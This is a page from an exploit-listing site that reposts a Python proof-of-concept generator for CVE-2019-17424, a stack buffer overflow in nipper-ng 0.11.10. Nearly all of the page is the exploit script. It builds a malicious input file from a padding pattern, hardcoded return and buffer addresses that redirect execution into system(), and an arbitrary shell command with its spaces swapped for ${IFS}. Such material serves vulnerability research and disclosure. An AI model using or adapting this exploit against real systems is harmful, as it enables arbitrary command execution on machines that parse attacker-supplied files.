Registernipperng 0.11.10 remote buffer overflow (poc)
▸▸▸ Exploit & Vulnerability >> remote exploit & linux vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC) # Date: 2019-10-20 # Exploit Author: Guy Levin # https://blog.vastart.dev # Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng # Software Link: https://code.google.com/archive/p/nipper-ng/source/default/source # Version: 0.11.10 # Tested on: Debian # CVE : CVE-2019-17424 """ Exploit generator created by Guy Levin (@va_start - twitter.com/va_start) Vulnerability found by Guy Levin (@va_start - twitter.com/va_start) For a detailed writeup of CVE-2019-17424 and the exploit building process, read my blog post https://blog.vastart.dev/2019/10/stack-overflow-cve-2019-17424.html may need to run nipper-ng with enviroment variable LD_BIND_NOW=1 on ceratin systems """ import sys import struct def pack_dword(i): return struct.pack("<I", i) def prepare_shell_command(shell_command): return shell_command.replace(" ", "${IFS}") def build_exploit(shell_command): EXPLOIT_SKELETON = r"privilage exec level 1 " \ "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \ "aasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab " \ "kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca " \ "acdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaac " \ "uaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadma " \ "adnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaae " \ "faaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewa " \ "aexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaaf " \ "paafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaagha " \ "agiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaag " \ "zaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahra " \ "ahaaaataahuaahvaahwaahpaaaaaaazaaibaaicaaidaaieaaifaaigaaihaaiiaaijaai " \ "kaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajca " \ "ajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaaj" WRITEABLE_BUFFER = 0x080FA001 CALL_TO_SYSTEM = 0x0804E870 COMMAND_BUFFER = 0x080FA015 OFFSET_FOR_WRITEABLE_BUFFER = 0x326 OFFSET_FOR_RETURN = 0x33a OFFSET_FOR_COMMAND_BUFFER = 0x33e OFFSET_FOR_SHELL_COMMAND = 0x2a MAX_SHELL_COMMAND_CHARS = 48 target_values_at_offsets = { WRITEABLE_BUFFER : OFFSET_FOR_WRITEABLE_BUFFER, CALL_TO_SYSTEM : OFFSET_FOR_RETURN, COMMAND_BUFFER : OFFSET_FOR_COMMAND_BUFFER } exploit = bytearray(EXPLOIT_SKELETON, "ascii") # copy pointers for target_value, target_offset in target_values_at_offsets.items(): target_value = pack_dword(target_value) exploit[target_offset:target_offset+len(target_value)] = target_value # copy payload if len(shell_command) > MAX_SHELL_COMMAND_CHARS: raise ValueError("shell command is too big") shell_command = prepare_shell_command(shell_command) if len(shell_command) > MAX_SHELL_COMMAND_CHARS: raise ValueError("shell command is too big after replacing spaces") # adding padding to end of shell command for i, letter in enumerate(shell_command + "&&"): exploit[OFFSET_FOR_SHELL_COMMAND+i] = ord(letter) return exploit def main(): if len(sys.argv) != 3: print(f"usage: {sys.argv[0]} <shell command to execute> <output file>") return 1 try: payload = build_exploit(sys.argv[1]) except Exception as e: print(f"error building exploit: {e}") return 1 open(sys.argv[2], "wb").write(payload) return 0 # success if __name__ == '__main__': main()
Nipperng 0.11.10 remote buffer overflow (poc) Vulnerability / Exploit Source : Nipperng 0.11.10 remote buffer overflow (poc)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes